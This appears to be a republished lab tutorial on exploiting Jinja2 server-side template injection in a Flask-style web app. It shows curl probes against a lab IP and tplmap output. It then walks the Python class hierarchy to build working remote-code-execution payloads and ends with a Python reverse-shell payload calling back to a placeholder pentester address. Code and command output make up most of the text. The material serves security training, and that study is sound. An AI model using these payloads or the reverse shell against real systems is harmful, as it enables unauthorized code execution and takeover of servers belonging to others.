SSTI Exploitation Part III In Web Applications (with exploitation example)

1 month ago 25

BOOK THIS SPACE FOR AD

ARTICLE AD

Once again, our focus will be on identifying if the application is vulnerable to Server-Side Template Injection.

User input is submitted via the cmd parameter through a GET request. Let's submit mathematical expressions in curly brackets in the input field, such as the ones mentioned on the SSTI Identification section, starting with {7*7}.

cURL — Interacting with the Target

curl -gs "http://64.227.40.203:31227/execute?cmd={7*7}"

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
#command {
resize: horizontal;
background-color : transparent;
border-color: transparent;
font-size: 15px;
width: 200px;

}
#command:active {
width: auto;
}
</style>
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static/css/jquery-ui.css">
<script src="/static/js/jquery-1.12.4.js"></script>
<script src="/static/js/jquery-ui.js"></script>
<script src="/static/js/script.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/style.css" />
<title>Windows</title>
</head>
<body>
<div id="desktop">
<div class="window" data-title="Run">
<form action="/execute" method="get">
<a>C:\><input type="text" name="cmd" id="command"></a>
<br/>
<a>{7*7}</a>
<br/>
<input type="submit" value="execute">
</form>
</div>
<div class="window" data-title="Windows">
<h1>Windows</h1>
<p>Minimize the windows to the taskbar, make them full screen or close them.</p>
<p>Drag the title bar to move the windows or resize them from the bottom right corner.</p>
</div>

<div id="icons">
<a class="openWindow" data-id="0">Run</a>
<a class="openWindow" data-id="1">Welcome</a>
</div>
<font size="5px"><a href="https://html5-templates.com/" rel="nofollow" target="_blank" id="templateLink">© HTML5-Templates.com</a></font>

</div>
</body>

It doesn’t look like the application evaluated the submitted expression. Let us continue with another expression, ${7*7} this time.

curl -gs 'http://64.227.40.203:31227/execute?cmd=${7*7}'

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
#command {
resize: horizontal;
background-color : transparent;
border-color: transparent;
font-size: 15px;
width: 200px;

}
#command:active {
width: auto;
}
</style>
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static/css/jquery-ui.css">
<script src="/static/js/jquery-1.12.4.js"></script>
<script src="/static/js/jquery-ui.js"></script>
<script src="/static/js/script.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/style.css" />
<title>Windows</title>
</head>
<body>
<div id="desktop">
<div class="window" data-title="Run">
<form action="/execute" method="get">
<a>C:\><input type="text" name="cmd" id="command"></a>
<br/>
<a>${7*7}</a>
<br/>
<input type="submit" value="execute">
</form>
</div>
<div class="window" data-title="Windows">
<h1>Windows</h1>
<p>Minimize the windows to the taskbar, make them full screen or close them.</p>
<p>Drag the title bar to move the windows or resize them from the bottom right corner.</p>
</div>

It doesn’t look like the application evaluated this expression either. What about {{7*7}}?

curl -gs "http://64.227.40.203:31227/execute?cmd={{7*7}}"

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
#command {
resize: horizontal;
background-color : transparent;
border-color: transparent;
font-size: 15px;
width: 200px;

}
#command:active {
width: auto;
}
</style>
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static/css/jquery-ui.css">
<script src="/static/js/jquery-1.12.4.js"></script>
<script src="/static/js/jquery-ui.js"></script>
<script src="/static/js/script.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/style.css" />
<title>Windows</title>
</head>
<body>
<div id="desktop">
<div class="window" data-title="Run">
<form action="/execute" method="get">
<a>C:\><input type="text" name="cmd" id="command"></a>
<br/>
<a>49</a>
<br/>
<input type="submit" value="execute">
</form>
</div>
<div class="window" data-title="Windows">
<h1>Windows</h1>
<p>Minimize the windows to the taskbar, make them full screen or close them.</p>
<p>Drag the title bar to move the windows or resize them from the bottom right corner.</p>
</div>

this time, the application evaluated the latest mathematical expression we submitted and returned the result, 49. It looks like we may be dealing with an SSTI vulnerability!

As already mentioned, the first thing we need to do when dealing with SSTI vulnerabilities is to identify the template engine the application is utilizing. Once again, let’s use PortSwigger’s diagram in the SSTI Identification. We already know that the {{7*7}} expression was evaluated successfully. The next expression the diagram suggests trying is {{7*'7'}}. Let us try it and see how the application responds.

curl -gs "http://64.227.40.203:31227/execute?cmd={{7*'7'}}"

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
#command {
resize: horizontal;
background-color : transparent;
border-color: transparent;
font-size: 15px;
width: 200px;

}
#command:active {
width: auto;
}
</style>
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static/css/jquery-ui.css">
<script src="/static/js/jquery-1.12.4.js"></script>
<script src="/static/js/jquery-ui.js"></script>
<script src="/static/js/script.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/style.css" />
<title>Windows</title>
</head>
<body>
<div id="desktop">
<div class="window" data-title="Run">
<form action="/execute" method="get">
<a>C:\><input type="text" name="cmd" id="command"></a>
<br/>
<a>7777777</a>
<br/>
<input type="submit" value="execute">
</form>
</div>
<div class="window" data-title="Windows">
<h1>Windows</h1>
<p>Minimize the windows to the taskbar, make them full screen or close them.</p>
<p>Drag the title bar to move the windows or resize them from the bottom right corner.</p>
</div>

The application successfully evaluated this expression as well. According to PortSwigger’s diagram, we are dealing with either a Jinja2 or a Twig template engine. That being said, the fact that {{7*’7'}} was evaluated with the application returning 7777777 means that Jinja2 is being utilized on the backend.

We could have automated the template engine identification process we just executed through tplmap, as follows.

tplmap.py

./tplmap.py -u 'http://64.227.40.203:31227/execute?cmd'

Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'cmd' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

GET parameter: cmd
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

The next step is to gain remote code execution on the target server. Before moving to the payload development part, let’s look at some Python for SSTI.

Below is a small dictionary from fatalerrors.org to refer to when going over the Jinja2 payload development part of this section:

__class__Returns the object (class) to which the type belongs__mro__Returns a tuple containing the base class inherited by the object. Methods are parsed in the order of tuples.__subclasses__Each new class retains references to subclasses, and this method returns a list of references that are still available in the class__builtins__Returns the builtin methods included in a function__globals__A reference to a dictionary that contains global variables for a function

6.__base__Returns the base class inherited by the object <-- (__ base__ and __ mro__ are used to find the base class)

7.__init__Class initialization method

Start by running Python:

Python 3 Interpreter

python3

Python 3.9.2 (default, Mar 23 2024, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

Create a string object and use type and __class__, as follows. Then use the dir() command to show all methods and attributes from the object.

>>> import flask
>>> s = 'HTB'
>>> type(s)

>>> s.__class__

>>> dir(s)

['__add__', '__class__', '__contains__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getnewargs__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mod__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rmod__', '__rmul__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'capitalize', 'casefold', 'center', 'count', 'encode', 'endswith', 'expandtabs', 'find', 'format', 'format_map', 'index', 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill']

The next step is to understand Python’s hierarchy. Using __mro__ or mro(), we can go back up the tree of inherited objects in the Python environment. Let's practice this as follows.

>>> s.__class__.__class__

>>> s.__class__.__base__

>>> s.__class__.__base__.__subclasses__()

[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>,
<SNIP>

>>> s.__class__.mro()[1].__subclasses__()

Now, let us look for useful classes that can facilitate remote code execution.

>>> x = s.__class__.mro()[1].__subclasses__()
>>> for i in range(len(x)):print(i, x[i].__name__)
...
0 type
1 weakref
2 weakcallableproxy
3 weakproxy
4 int
5 bytearray
6 bytes
7 list
8 NoneType
<SNIP>

>>> def searchfunc(name):
... x = s.__class__.mro()[1].__subclasses__()
... for i in range(len(x)):
... fn = x[i].__name__
... if fn.find(name) > -1:
... print(i, fn)
...
>>> searchfunc('warning')

215 catch_warnings

Why are we searching for warning you may ask. We chose this class because it imports Python's sys module , and from sys, the os module can be reached. More precisely, os modules are all from warnings.catch_.

Please note that you will probably come across a different number. Back to our Python for SSTI specifics, we have seen that catch_warnings is present without importing any additional module to our Python console. Let's enumerate the builtins from this class as follows.

>>> y = x[215]
>>> y

>>> y()._module.__builtins__

{'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins', loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__': <built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>, 'ascii': <built-in function ascii>, 'bin': <built-in function bin>, 'breakpoint': <built-in function breakpoint>, 'callable': <built-in function callable>, 'chr': <built-in function chr>, 'compile': <built-in function compile>, 'delattr': <built-in function delattr>, 'dir': <built-in function dir>, 'divmod': <built-in function divmod>, 'eval': <built-in function eval>, 'exec': <built-in function exec>, 'format': <built-in function format>, 'getattr': <built-in function getattr>, 'globals': <built-in function globals>,
<SNIP>

>>> z = y()._module.__builtins__
>>> for i in z:
... if i.find('import') >-1:
... print(i, z[i])
...
__import__ <built-in function __import__>

It seems we have reached the import function by walking the hierarchy. This means we can load os and use the system function to execute code all coming from a string object, as follows.

>>> ''.__class__.__mro__[1].__subclasses__()

[215]()._module.__builtins__['__import__']('os').system('echo RCE from a string object')
RCE from a string object
0

Returning to our vulnerable web application, let’s see how we can repeat the same process and develop an RCE payload. Remember that the below payloads can be submitted to the application via the browser as is or via cURL after being URL encoded.

Payload:

Curl — Interacting with the Target

curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%20%27%27.__class__%20%7D%7D"

Payload

Curl — Interacting with the Target

curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%20%7D%7D"

We are interested in the second item, so the payload should become:

Code: python

{{ ''.__class__.__mro__[1] }}curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%20%7D%7D"

Let us start walking down the hierarchy, as follows.

Code: python

{{ ''.__class__.__mro__[1].__subclasses__() }}curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%20%7D%7D"

Let us print out the number and the method names using the following payload.

Code: python

{% for i in range(450) %}
{{ i }}
{{ ''.__class__.__mro__[1].__subclasses__()[i].__name__ }}
{% endfor %}curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%25%20for%20i%20in%20range%28450%29%20%25%7D%20%7B%7B%20i%20%7D%7D%20%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5Bi%5D.__name__%20%7D%7D%20%7B%25%20endfor%20%25%7D"

<SNIP>
<body>
<div id="desktop">
<div class="window" data-title="Run">
<form action="/execute" method="get">
<a>C:\><input type="text" name="cmd" id="command"></a>
<br/>
<a> 0 type 1 weakref 2 weakcallableproxy 3 weakproxy 4 int 5 bytearray 6 bytes 7 list 8 NoneType 9 NotImplementedType 10 traceback 11 super 12 range 13 dict 14 dict_keys 15 dict_values 16 dict_items 17 dict_reversekeyiterator 18 dict_reversevalueiterator 19 dict_reverseitemiterator 20 odict_iterator 21 set 22 str 23 slice 24 staticmethod 25 complex 26 float 27 frozenset 28 property 29 managedbuffer 30 memoryview 31 tuple 32 enumerate 33 reversed 34 stderrprinter 35 code 36 frame 37 builtin_function_or_method 38 method 39 function 40 mappingproxy 41 generator 42 getset_descriptor 43 wrapper_descriptor 44 method-wrapper 45 ellipsis 46 member_descriptor 47 SimpleNamespace 48 PyCapsule 49 longrange_iterator 50 cell 51 instancemethod 52 classmethod_descriptor 53 method_descriptor 54 callable_iterator 55 iterator 56 PickleBuffer 57 coroutine 58 coroutine_wrapper 59 InterpreterID 60 EncodingMap 61 fieldnameiterator 62 formatteriterator 63 BaseException 64 hamt 65 hamt_array_node 66 hamt_bitmap_node 67 hamt_collision_node 68 keys 69 values 70 items 71 Context 72 ContextVar 73 Token 74 MISSING 75 moduledef 76 module 77 filter 78 map 79 zip 80 _ModuleLock 81 _DummyModuleLock 82 _ModuleLockManager 83 ModuleSpec 84 BuiltinImporter 85 classmethod 86 FrozenImporter 87 _ImportLockContext 88 _localdummy 89 _local 90 lock 91 RLock 92 _IOBase 93 _BytesIOBuffer 94 IncrementalNewlineDecoder 95 ScandirIterator 96 DirEntry 97 WindowsRegistryFinder 98 _LoaderBasics 99 FileLoader 100 _NamespacePath 101 _NamespaceLoader 102 PathFinder 103 FileFinder 104 zipimporter 105 _ZipImportResourceReader 106 Codec 107 IncrementalEncoder 108 IncrementalDecoder 109 StreamReaderWriter 110 StreamRecoder 111 _abc_data 112 ABC 113 dict_itemiterator 114 Hashable 115 Awaitable 116 AsyncIterable 117 async_generator 118 Iterable 119 bytes_iterator 120 bytearray_iterator 121 dict_keyiterator 122 dict_valueiterator 123 list_iterator 124 list_reverseiterator 125 range_iterator 126 set_iterator 127 str_iterator 128 tuple_iterator 129 Sized 130 Container 131 Callable 132 _wrap_close 133 Quitter 134 _Printer 135 _Helper 136 itemgetter 137 attrgetter 138 methodcaller 139 accumulate 140 combinations 141 combinations_with_replacement 142 cycle 143 dropwhile 144 takewhile 145 islice 146 starmap 147 chain 148 compress 149 filterfalse 150 count 151 zip_longest 152 permutations 153 product 154 repeat 155 groupby 156 _grouper 157 _tee 158 _tee_dataobject 159 Repr 160 deque 161 _deque_iterator 162 _deque_reverse_iterator 163 _tuplegetter 164 _Link 165 partial 166 _lru_cache_wrapper 167 partialmethod 168 singledispatchmethod 169 cached_property 170 DynamicClassAttribute 171 _GeneratorWrapper 172 auto 173 Enum 174 Pattern 175 Match 176 SRE_Scanner 177 State 178 SubPattern 179 Tokenizer 180 Scanner 181 Template 182 Formatter 183 ContextDecorator 184 _GeneratorContextManagerBase 185 _BaseExitStack 186 _Final 187 _Immutable 188 Generic 189 _TypingEmpty 190 _TypingEllipsis 191 NamedTuple 192 typing.io 193 typing.re 194 AST 195 _MarkupEscapeHelper 196 poll 197 epoll 198 BaseSelector 199 socket 200 _IterationGuard 201 WeakSet 202 _RLock 203 Condition 204 Semaphore 205 Event 206 Barrier 207 Thread 208 BaseServer 209 ForkingMixIn 210 _NoThreads 211 ThreadingMixIn 212 BaseRequestHandler 213 WarningMessage 214 catch_warnings 215 date 216 timedelta 217 time 218 tzinfo 219 _Info 220 finalize 221 sha384 222 sha512 223 Random 224 _ResultMixinStr 225 _ResultMixinBytes 226 _NetlocResultMixinBase 227 _localized_month 228 _localized_day 229 Calendar 230 different_locale 231 AddrlistClass 232 Struct 233 unpack_iterator 234 Charset 235 Header 236 _ValueFormatter 237 _PolicyBase 238 BufferedSubFile 239 FeedParser 240 Parser 241 BytesParser 242 Message 243 HTTPConnection 244 _SSLContext 245 _SSLSocket 246 MemoryBIO 247 Session 248 SSLObject 249 MimeTypes 250 Compress 251 Decompress 252 BZ2Compressor 253 BZ2Decompressor 254 LZMACompressor 255 LZMADecompressor 256 Bytecode 257 Untokenizer 258 BlockFinder 259 _void 260 _empty 261 Parameter 262 BoundArguments 263 Signature 264 FrameSummary 265 TracebackException 266 LogRecord 267 PercentStyle 268 Formatter 269 BufferingFormatter 270 Filter 271 Filterer 272 PlaceHolder 273 Manager 274 LoggerAdapter 275 _Missing 276 Aborter 277 Href 278 CompletedProcess 279 Popen 280 HASH 281 blake2b 282 blake2s 283 sha3_224 284 sha3_256 285 sha3_384 286 sha3_512 287 shake_128 288 shake_256 289 _RandomNameSequence 290 _TemporaryFileCloser 291 _TemporaryFileWrapper 292 SpooledTemporaryFile 293 TemporaryDirectory 294 Request 295 OpenerDirector 296 BaseHandler 297 HTTPPasswordMgr 298 AbstractBasicAuthHandler 299 AbstractDigestAuthHandler 300 URLopener 301 ftpwrapper 302 Cookie 303 CookiePolicy 304 Absent 305 CookieJar 306 ImmutableListMixin 307 ImmutableDictMixin 308 _omd_bucket 309 Headers 310 ImmutableHeadersMixin 311 IfRange 312 Range 313 ContentRange 314 FileStorage 315 _HAS_DEFAULT_FACTORY_CLASS 316 _MISSING_TYPE 317 _FIELD_BASE 318 InitVar 319 Field 320 _DataclassParams 321 Event 322 MultipartDecoder 323 MultipartEncoder 324 Finder 325 Loader 326 ResourceReader 327 ImpImporter 328 ImpLoader 329 HMAC 330 ClosingIterator 331 FileWrapper 332 _RangeWrapper 333 HTMLBuilder 334 AcceptMixin 335 AuthorizationMixin 336 WWWAuthenticateMixin 337 Scanner 338 Encoder 339 JSONDecoder 340 JSONEncoder 341 FormDataParser 342 MultiPartParser 343 UserAgent 344 _UserAgentParser 345 Request 346 StreamOnlyMixin 347 Response 348 ResponseStream 349 ResponseStreamMixin 350 CommonRequestDescriptorsMixin 351 CommonResponseDescriptorsMixin 352 ETagRequestMixin 353 ETagResponseMixin 354 UserAgentMixin 355 _TestCookieHeaders 356 _TestCookieResponse 357 EnvironBuilder 358 Client 359 Decimal 360 Context 361 SignalDictMixin 362 ContextManager 363 Number 364 UUID 365 Unpickler 366 Pickler 367 Pdata 368 PicklerMemoProxy 369 UnpicklerMemoProxy 370 _Framer 371 _Unframer 372 _Pickler 373 _Unpickler 374 Bucket 375 BytecodeCache 376 MissingType 377 LRUCache 378 Cycler 379 Joiner 380 Namespace 381 EvalContext 382 Node 383 NodeVisitor 384 Symbols 385 MacroRef 386 Frame 387 TemplateReference 388 Context 389 BlockReference 390 LoopContext 391 Macro 392 Undefined 393 NodeVisitor 394 Failure 395 TokenStreamIterator 396 TokenStream 397 Lexer 398 Parser 399 Environment 400 Template 401 TemplateModule 402 TemplateExpression 403 TemplateStream 404 BaseLoader 405 Local 406 LocalStack 407 LocalManager 408 _ProxyLookup 409 LocalProxy 410 SequenceMatcher 411 Differ 412 HtmlDiff 413 _safe_key 414 PrettyPrinter 415 RuleFactory 416 RuleTemplate 417 BaseConverter 418 Map 419 MapAdapter 420 NullTranslations 421 _FixupStream 422 _AtomicFile 423 LazyFile 424 KeepOpenFile 425 PacifyFlushWrapper 426 ParamType 427 Option 428 Argument 429 ParsingState 430 OptionParser 431 HelpFormatter 432 Context 433 BaseCommand 434 Parameter 435 Namespace 436 _FakeSignal 437 DispatchingApp 438 ScriptInfo 439 ConfigAttribute 440 _AppCtxGlobals 441 AppContext 442 RequestContext 443 Scaffold 444 _CompactJSON 445 SigningAlgorithm 446 Signer 447 Serializer 448 JSONTag 449 TaggedJSONSerializer </a>
<br/>
<input type="submit" value="execute">
</form>
</div>
<SNIP>
</body>

As you can see in the application’s response, catch_warnings is located at index #214.

We have everything we need to construct an RCE payload, such as the following.

Code: python

{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').system("touch /tmp/test1") }}curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5B214%5D%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.system%28%22touch%20%2Ftmp%2Ftest1%22%29%20%7D%7D"

The application returns 0 in its response. This is the return of the value of the command we just executed. 0 indicates that the command was executed without errors.

We can identify if test1 was created using the following payload.

Code: python

{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('ls /tmp').read()}}curl -gs "http://64.227.40.203:31227/execute?cmd=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5B214%5D%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28%27ls%20%2Ftmp%27%29.read%28%29%7D%7D"

Now that we have gone through the payload development process, it’s worth mentioning that we can use some specific functions to facilitate the exploitation of Jinja2 SSTI vulnerabilities. Those are request and lipsum.

Code: python

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

Code: python

A reverse shell can also be established through a payload such as the below.

Code: python

{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('python -c \'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'').read()}}

Now, proceed to this section’s exercise and complete the objective either by crafting the payload yourself or through a shell obtained with the help of tplmap.

Read Entire Article